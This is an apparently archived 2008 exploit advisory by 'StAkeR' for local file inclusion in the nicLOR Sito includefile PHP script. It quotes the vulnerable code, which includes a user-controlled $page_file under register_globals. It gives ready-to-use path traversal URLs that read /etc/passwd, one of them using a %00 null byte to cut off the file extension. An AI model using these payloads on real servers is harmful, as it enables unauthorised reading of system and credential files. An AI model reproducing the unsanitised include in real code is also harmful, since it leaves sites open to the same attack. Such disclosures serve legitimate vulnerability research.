[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : nicLOR Sito includefile Local File Inclusion Vulnerabilities
# Published : 2008-11-04
# Author : StAkeR
# Previous Title : WEBBDOMAIN Post Card <= 1.02 (SQL Injection) Auth Bypass Vuln
# Next Title : TR News <= 2.1 (login.php) Remote Login Bypass Exploit


# ------------------------------------------------------------
# Sito includefile in PHP Local File Inclusion Vulnerabilities
# ------------------------------------------------------------
# Discovered By StAkeR[at]hotmail[dot]it
# Download On http://www.niclor.net/prodotti/include_Sito_PHP/include_Sito_PHP.zip
# -----------------------------------------------------------

# File (includefile.php)
# Register Globals On
1. <? 
2. if (($page != "") or ($page == "home")) {
3.    include "pagine/$page_file";
4. } else {
5.    include "pagine/home.php";
6. }
7. ?>

# includefile.php?page=athos&page_file=../../../../../../etc/passwd

# File (index.php)
# Magic_Quotes_GPC
# index.php?id=../../../../../etc/passwd%00 

# www.Syue.com [2008-11-04]